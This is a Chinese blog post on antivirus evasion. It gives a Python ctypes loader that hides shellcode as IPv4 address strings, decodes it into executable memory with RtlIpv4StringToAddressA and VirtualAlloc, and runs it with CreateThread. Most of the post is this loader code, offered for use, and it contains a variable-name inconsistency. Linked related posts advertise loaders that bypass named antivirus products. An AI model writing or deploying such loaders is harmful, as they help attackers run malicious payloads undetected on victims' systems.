[免杀]基于python的ipv4加载器

已于 2023-10-25 15:31:46 修改
阅读量3.8k 收藏 1
点赞数
分类专栏: 免杀 文章标签: 安全
于 2022-04-07 17:52:02 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/luochen2436/article/details/124008356
版权

文章目录

IPV4

IPv4是一种无连接的协议,操作在使用分组交换的链路层(如以太网)上。此协议会尽最大努力交付数据包,意即它不保证任何数据包均能送达目的地,也不保证所有数据包均按照正确的顺序无重复地到达。IPv4使用32位(4字节)地址,因此地址空间中只有4,294,967,296个地址,格式如下:

格式从点分十进制转换
点分十进制192.0.2.235不适用
点分十六进制0xC0.0x00.0x02.0xEB每个字节被单独转换为十六进制
点分八进制0300.0000.0002.0353每个字节被单独转换为八进制
十六进制0xC00002EB将点分十六进制连在一起
十进制3221226219用十进制写出的32位整数
八进制030000001353用八进制写出的32位整数

将shellcode字节转为Ipv4格式

python中可以利用ctypes库来链接Ntdll动态链接库中的RtlIpv4AddressToStringA函数来将Shellcode转换为ipv4格式
api函数原型:https://docs.microsoft.com/en-us/windows/win32/api/ip2string/nf-ip2string-rtlipv4addresstostringa

NTSYSAPI PSTR RtlIpv4AddressToStringA(
  [in]  const in_addr *Addr,
  [out] PSTR          S
);

Addr参数指按网络字节顺序排列的IPv4地址。
S参数指向缓冲区的指针,用于存储IPv4地址以NULL结尾的字符串表示形式。这个缓冲区应该足够大,可以容纳至少16个字符。

注意:4个字节转换一个Ipv4值,\x00是一个字节,当使用该函数后4个字节会变成16-1(\x00)个字节,即15个字节,当剩余字节数不满4个需要添加\x00补充字节数,必须将全部的shellcode全部转化为Ipv4值

# shellcode填充为4的倍数
shellcode = "\xfc\x48\x83......x00\x00"
#申请ipv4虚拟内存
ipv4_address = ctypes.windll.kernel32.VirtualAlloc(0,ctypes.c_int(len(shellcode)//4*16),0x3000,0x40)

#将tlIpv4AddressToStringA将shellcode转换为ipv4字符串
for i in range(len(shellcode)//4):
    cut_byte = shellcode[i*4:4+i*4]
    ctypes.windll.Ntdll.RtlIpv4AddressToStringA(cut_byte, ipv4_address+i*16)

将Ipv4写入内存

RtlIpv4StringToAddress 函数将 IPv4 地址的字符串表示形式转换为二进制 IPv4 地址。
api函数原型:https://docs.microsoft.com/en-us/windows/win32/api/ip2string/nf-ip2string-rtlipv4stringtoaddressa

NTSYSAPI NTSTATUS RtlIpv4StringToAddressA(
  [in]  PCSTR   S,
  [in]  BOOLEAN Strict,
  [out] PCSTR   *Terminator,
  [out] in_addr *Addr
);

s参数指向包含 IPv4 地址的以NULL结尾的字符串表示形式的缓冲区的指针。
Strict参数一个值,指示字符串是否必须是用严格的四部分点分十进制表示法表示的 IPv4 地址。如果此参数为TRUE,则字符串必须是点分十进制,有四个部分。如果此参数为FALSE,则允许使用十进制、八进制或十六进制表示法的四种可能形式中的任何一种。
Terminator参数指向终止转换字符串的字符的指针
Addr要存储 IPv4 地址的二进制表示的指针。

ipv4_list = []
#获取IPv4 地址的字符串
for i in range(len(shellcode)//4):
     ipv4_str = ctypes.string_at(ipv4address+i*16,16)
     ipv4_list.append(ipv4_str)
#申请shellcode内存
ptr = ctypes.windll.kernel32.VirtualAlloc(0, len(shellcode), 0x3000, 0x40)
ptr1 = ptr
#RtlIpv4StringToAddressA将ipv4转为二进制写入内存,内存递归增长4
for i in range(len(ipv4_list)):     
	 ctypes.windll.Ntdll.RtlIpv4StringToAddressA(ipv4_list[i],False,ipv4_list[i],ptr1)
	 ptr1 += 4

创建进程

handle = ctypes.windll.kernel32.CreateThread(0, 0, ptr, 0, 0, 0)
ctypes.windll.kernel32.WaitForSingleObject(handle, -1)

【每当你想要批评什么人的时候,你要记住并不是所有人都有你所拥有的优势。】

3tefanie丶zhou
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
python加载_利用Python反序列化运行加载实现免杀
weixin_36266554的博客
02-04 533
前言前几天在看Python的shellcode加载,在网上找了一个,结果加载自身就过不了火绒,测试发现是火绒对关键语句进行了识别。 所以我们要想办法去掉加载中明显的特征。原理及实现在绕过静态查杀方面,主要就是要隐藏特征,比较常见的就是各种混淆、加密,但加密后的代码到最终还是需要去执行它才行,代码执行这一个操作其实特征也是很明显的,像exec、eval、os.system、subprocess...
使用Python进行防病毒免杀解析
09-18
主要介绍了使用Python进行防病毒免杀,本文给大家介绍的非常详细,具有一定的参考借鉴价值,需要的朋友可以参考下
php5.5 反序列化利用工具_利用Python反序列化运行加载实现免杀
weixin_39558521的博客
11-25 110
前言前几天在看Python的shellcode加载,在网上找了一个,结果加载自身就过不了火绒,测试发现是火绒对关键语句进行了识别。所以我们要想办法去掉加载中明显的特征。原理及实现在绕过静态查杀方面,主要就是要隐藏特征,比较常见的就是各种混淆、加密,但加密后的代码到最终还是需要去执行它才行,代码执行这一个操作其实特征也是很明显的,像exec、eval、os.system、subpro...
python加载shellcode免杀
qq_43884092的博客
10-12 1014
编码,生成混淆后的shellcode和加载,写入文件a.txt。可以过卡巴斯基静态和动态特征正常上线(这里使用的payload为。可以过火绒静态和动态特征正常上线,但无法过360和卡巴斯基。将加密和编码后的shellcode和加载代码通过网络下载。pyinstaller进行打包(打包前删除所有注释)编码,生成混淆后的shellcode和加载。可以过360静态和动态特征正常上线。可以过360静态和动态特征正常上线。可以过火绒静态和动态特征正常上线。可以过火绒静态和动态特征正常上线。
免杀对抗-内存加载-shellcode转换-UUID+MAC+IPV4
xiaoheizi的博客
09-26 1433
IP地址与MAC地址在计算机里都是以二进制表示的,IP地址是32位的,而MAC地址则是48位(6个字节)的。IPv4使用32位(4字节)地址。介绍:通用唯一识别码(UUID),是用于计算机体系中以识别信息数目的一个128位标识符,根据标准方法生成,不依赖中央机构的注册和分配,UUID具有唯一性。此shellcode转换uuid的方法还可以使用:C# Python2 Go 等语言的shellcode加载实施免杀。2.使用32位的加载执行,将uuid类型的shellcode放到如下加载中。
[免杀]基于python的uuid加载
3tefanie丶zhou的博客
04-02 4040
【开玩笑没关系,但是切记言多必失。】
通过Python实现Payload分离免杀过程详解
09-16
主要介绍了通过Python实现Payload分离免杀过程详解,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友可以参考下
基于Python的shellcode加载+源代码+文档说明
12-01
基于Python的shellcode加载(代码+文档说明) -------- 该资源内项目源码是个人的毕设,代码都测试ok,都是运行成功后才上传资源,答辩评审平均分达到96分,放心下载使用! <项目介绍> 1、该资源内项目代码都经过...
基于python的专业英语翻译实现.pdf
11-27
基于python的专业英语翻译实现.pdf
利用Python反序列化运行加载实现免杀1
08-03
前言前几天在看Python的shellcode加载,在网上找了一个,结果加载自身就过不了火绒,测试发现是火绒对关键语句进行了识别。所以我们要想办法去掉加载
花里胡哨免杀《剪切板加载
小刚的博客
09-16 1049
前言 最近研究内存加载魔怔了,我们知道所有内存加载原理都一个样:申请可执行内存->shellcode写入内存->执行该内存 申请内存还是比较好说的,去win开发手册搜搜就能找到很多申请内存的api,然后使用VirtualProtect将申请的内存区块设置为可执行即可 执行内存里面的内容也好说,使用CreateThread创建一个进程是常用的,或者使用EnumSystemLocalesA等回调函数直接运行也是可以的,这种回调函数在开发手册也随处可见 困难的是怎么把shellcode写入内存当中
Shellcode免杀对抗(Python)
最新发布
qq_74806534的博客
02-17 2万+
常用参数 含义 -i 或 -icon 生成icon -F 创建一个绑定的可执行文件 -w 使用窗口,无控制台 -C 使用控制台,无窗口 -D 创建一个包含可执行文件的单文件夹包(默认情况下) -n 文件名。先cs生成payload,此时生成c的和Python应该是效果一样的(x64尽量不开,因为我没有尝试成功)注意在生成的payload是被分行的,放到的代码里的时候,要像CS一样并成一行,很麻烦。先base64,可以过掉火绒,过不了defender/360。
Python免杀技术详解
weixin_68789096的博客
11-02 1417
在网络安全领域,Shellcode加载通常被黑客用于将Shellcode加载到目标计算机的内存中并执行它。这些加载安全专业人员、研究人员和安全分析师用于分析恶意软件样本中的Shellcode部分,以便了解恶意软件的行为、目的和潜在威胁。Python的灵活性和强大的库,使得Python逐渐被用于Shellcode的加载免杀技术。我们可以利用Python中的ctypes库实现shellcode的加载,ctypes是Python的外部函数库。
IP地址格式转换
hou09tian的博客
10-17 1835
通过RtlIpv4StringToAddressA()和RtlIpv4AddressToStringA()函数可以实现in_addr格式的IP地址与字符串格式的IP地址之间的互换。 1 RtlIpv4StringToAddressA()函数 1.1函数格式 该函数的作用是将字符串格式的IP地址转换为in_addr结构的IP地址。该函数的格式为 NTSYSAPI NTSTATUS RtlI...
免杀方法(四)Python免杀shellcode加载
qq_56426046的博客
10-03 1204
免杀方式 msfvenom生成raw格式的shellcode–>base64–>XOR–>AES将python代码缩小并混淆最后生成exe目前过DF、360和火绒 virustotal:7/66过卡巴斯基、迈克菲等。
Python实现免杀Shellcode加载编写
m0_56187372的博客
12-11 1005
利用python实现免杀shellcode加载的编写
免杀学习-认识shellcode
willing-sir的博客
12-16 680
免杀学习-认识shellcode 接着暑假的学习继续更,这学期比较忙,学校里要过逆向考试,加上学生会加上新生班助,还要忙着研究小车做比赛作品,杂七杂八的事一大堆就没更。 这个学期正好学了点逆向的基础知识,那就借此机会学习一下免杀,也是内网渗透比较重要的一个东西,争取这个寒假搓个免杀马,玩一玩兄弟的电脑 什么是shellcode 这一大堆反斜杠加数字是一串msfvenom生成的shellcod...
python shellcode加载
09-19
Python shellcode 加载是一个程序,它能够从字节串中动态地加载和执行二进制代码。这种技术通常用于绕过安全措施,因为它可以避免将可疑代码写入硬盘驱动或在文件中进行存储,而是将其保存在内存中直接执行。 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值